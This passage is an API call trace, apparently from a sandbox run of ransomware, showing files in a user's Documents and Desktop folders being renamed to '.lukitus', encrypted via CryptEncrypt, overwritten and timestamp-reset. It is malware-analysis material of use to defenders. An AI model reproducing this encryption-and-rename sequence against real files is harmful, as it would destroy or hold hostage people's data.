lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0106.675] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0106.675] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Documents\\gxamJ-HMXiK0nNB-ChDC.pptx" (normalized: "c:\\users\\aetadzjz\\documents\\gxamj-hmxik0nnb-chdc.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0106.676] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Documents\\gxamJ-HMXiK0nNB-ChDC.pptx" (normalized: "c:\\users\\aetadzjz\\documents\\gxamj-hmxik0nnb-chdc.pptx"), lpNewFileName="c:\\Users\\aETAdzjz\\Documents\\F56924BE-9663-41BB-42DA6451-74994B3B23EB.lukitus" (normalized: "c:\\users\\aetadzjz\\documents\\f56924be-9663-41bb-42da6451-74994b3b23eb.lukitus"), dwFlags=0x9) returned 1 [0106.677] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0106.677] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0106.682] ReadFile (in: hFile=0x324, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x8856, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x8856, lpOverlapped=0x0) returned 1 [0106.683] SetFilePointer (in: hFile=0x324, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0106.683] WriteFile (in: hFile=0x324, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x8856, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x8856, lpOverlapped=0x0) returned 1 [0106.683] WriteFile (in: hFile=0x324, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0106.683] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x639bab90, dwHighDateTime=0x1d31760)) [0106.684] SetFileTime (hFile=0x324, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0106.684] FlushFileBuffers (hFile=0x324) returned 1 [0106.688] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Documents\\AofloKRSx6EqvwHf tV.ots" (normalized: "c:\\users\\aetadzjz\\documents\\aoflokrsx6eqvwhf tv.ots"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x304a7700, ftCreationTime.dwHighDateTime=0x1d2fdff, ftLastAccessTime.dwLowDateTime=0x366c92d0, ftLastAccessTime.dwHighDateTime=0x1d2fd28, ftLastWriteTime.dwLowDateTime=0x366c92d0, ftLastWriteTime.dwHighDateTime=0x1d2fd28, nFileSizeHigh=0x0, nFileSizeLow=0x15948)) returned 1 [0106.688] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.688] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.688] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.688] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.688] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.688] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.689] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.689] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.689] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.689] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.689] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.689] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.689] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.689] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.689] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.689] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.689] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.689] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.689] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.689] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.689] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0106.689] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0106.689] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Documents\\AofloKRSx6EqvwHf tV.ots" (normalized: "c:\\users\\aetadzjz\\documents\\aoflokrsx6eqvwhf tv.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0106.689] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Documents\\AofloKRSx6EqvwHf tV.ots" (normalized: "c:\\users\\aetadzjz\\documents\\aoflokrsx6eqvwhf tv.ots"), lpNewFileName="c:\\Users\\aETAdzjz\\Documents\\F56924BE-9663-41BB-E0725B46-87EAD7FBFED8.lukitus" (normalized: "c:\\users\\aetadzjz\\documents\\f56924be-9663-41bb-e0725b46-87ead7fbfed8.lukitus"), dwFlags=0x9) returned 1 [0106.691] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0106.691] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0106.696] ReadFile (in: hFile=0x324, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x15948, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x15948, lpOverlapped=0x0) returned 1 [0106.696] SetFilePointer (in: hFile=0x324, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0106.696] WriteFile (in: hFile=0x324, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x15948, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x15948, lpOverlapped=0x0) returned 1 [0106.697] WriteFile (in: hFile=0x324, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0106.697] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x639e0cf0, dwHighDateTime=0x1d31760)) [0106.697] SetFileTime (hFile=0x324, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0106.697] FlushFileBuffers (hFile=0x324) returned 1 [0106.700] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Desktop\\D8nCf-5QuttckP.odt" (normalized: "c:\\users\\aetadzjz\\desktop\\d8ncf-5quttckp.odt"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5cca98b0, ftCreationTime.dwHighDateTime=0x1d305bf, ftLastAccessTime.dwLowDateTime=0x7ebb3060, ftLastAccessTime.dwHighDateTime=0x1d303e4, ftLastWriteTime.dwLowDateTime=0x7ebb3060, ftLastWriteTime.dwHighDateTime=0x1d303e4, nFileSizeHigh=0x0, nFileSizeLow=0x187be)) returned 1 [0106.700] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.700] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.700] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.700] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.700] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.700] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.700] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.700] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.700] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.700] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.700] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.700] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.700] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.700] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.700] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.700] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.701] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.701] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.701] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.701] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.701] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0106.701] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0106.701] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Desktop\\D8nCf-5QuttckP.odt" (normalized: "c:\\users\\aetadzjz\\desktop\\d8ncf-5quttckp.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0106.701] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Desktop\\D8nCf-5QuttckP.odt" (normalized: "c:\\users\\aetadzjz\\desktop\\d8ncf-5quttckp.odt"), lpNewFileName="c:\\Users\\aETAdzjz\\Desktop\\F56924BE-9663-41BB-527C0C14-E324030A4A6E.lukitus" (normalized: "c:\\users\\aetadzjz\\desktop\\f56924be-9663-41bb-527c0c14-e324030a4a6e.lukitus"), dwFlags=0x9) returned 1 [0106.702] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0106.702] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0106.708] ReadFile (in: hFile=0x324, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x187be, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x187be, lpOverlapped=0x0) returned 1 [0106.709] SetFilePointer (in: hFile=0x324, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0106.709] WriteFile (in: hFile=0x324, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x187be, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x187be, lpOverlapped=0x0) returned 1 [0106.710] WriteFile (in: hFile=0x324, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0106.710] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x63a06e50, dwHighDateTime=0x1d31760)) [0106.710] SetFileTime (hFile=0x324, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0106.710] FlushFileBuffers (hFile=0x324) returned 1 [0106.713] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Documents\\H 34byGorwd3.xlsx" (normalized: "c:\\users\\aetadzjz\\documents\\h 34bygorwd3.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d79af20, ftCreationTime.dwHighDateTime=0x1d2cf94, ftLastAccessTime.dwLowDateTime=0x25de5700, ftLastAccessTime.dwHighDateTime=0x1d2ebb2, ftLastWriteTime.dwLowDateTime=0x25de5700, ftLastWriteTime.dwHighDateTime=0x1d2ebb2, nFileSizeHigh=0x0, nFileSizeLow=0xf0c5)) returned 1 [0106.713] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.713] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.713] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.713] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.713] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.713] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.713] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.713] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.713] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.713] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.713] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.713] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.713] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.713] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.713] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.713] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.713] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.713] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.713] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.713] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.713] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0106.713] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0106.713] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Documents\\H 34byGorwd3.xlsx" (normalized: "c:\\users\\aetadzjz\\documents\\h 34bygorwd3.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0106.713] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Documents\\H 34byGorwd3.xlsx" (normalized: "c:\\users\\aetadzjz\\documents\\h 34bygorwd3.xlsx"), lpNewFileName="c:\\Users\\aETAdzjz\\Documents\\F56924BE-9663-41BB-526E1A2B-128166908518.lukitus" (normalized: "c:\\users\\aetadzjz\\documents\\f56924be-9663-41bb-526e1a2b-128166908518.lukitus"), dwFlags=0x9) returned 1 [0106.715] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0106.715] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0106.721] ReadFile (in: hFile=0x324, lpBuffer=0x2da0020, nNumberOfBytesToRead=0xf0c5, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0xf0c5, lpOverlapped=0x0) returned 1 [0106.722] SetFilePointer (in: hFile=0x324, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0106.722] WriteFile (in: hFile=0x324, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0xf0c5, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0xf0c5, lpOverlapped=0x0) returned 1 [0106.722] WriteFile (in: hFile=0x324, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0106.722] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x63a2cfb0, dwHighDateTime=0x1d31760)) [0106.723] SetFileTime (hFile=0x324, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0106.723] FlushFileBuffers (hFile=0x324) returned 1 [0106.725] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Documents\\izRfTW.odt" (normalized: "c:\\users\\aetadzjz\\documents\\izrftw.odt"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0918fa0, ftCreationTime.dwHighDateTime=0x1d2f986, ftLastAccessTime.dwLowDateTime=0xd6147720, ftLastAccessTime.dwHighDateTime=0x1d30495, ftLastWriteTime.dwLowDateTime=0xd6147720, ftLastWriteTime.dwHighDateTime=0x1d30495, nFileSizeHigh=0x0, nFileSizeLow=0xa246)) returned 1 [0106.725] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.725] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.725] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.726] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.726] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.726] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.726] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.726] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.726] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.726] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.726] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.726] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.726] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.726] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.726] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.726] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.726] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.726] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.726] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.726] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.726] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0106.726] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0106.726] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Documents\\izRfTW.odt" (normalized: "c:\\users\\aetadzjz\\documents\\izrftw.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0106.726] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Documents\\izRfTW.odt" (normalized: "c:\\users\\aetadzjz\\documents\\izrftw.odt"), lpNewFileName="c:\\Users\\aETAdzjz\\Documents\\F56924BE-9663-41BB-15FBD8AA-4D0A91F58ED4.lukitus" (normalized: "c:\\users\\aetadzjz\\documents\\f56924be-9663-41bb-15fbd8aa-4d0a91f58ed4.lukitus"), dwFlags=0x9) returned 1 [0106.729] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0106.729] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0106.735] ReadFile (in: hFile=0x324, lpBuffer=0x2da0020, nNumberOfBytesToRead=0xa246, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0xa246, lpOverlapped=0x0) returned 1 [0106.736] SetFilePointer (in: hFile=0x324, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0106.736] WriteFile (in: hFile=0x324, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0xa246, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0xa246, lpOverlapped=0x0) returned 1 [0106.736] WriteFile (in: hFile=0x324, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0106.737] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x63a53110, dwHighDateTime=0x1d31760)) 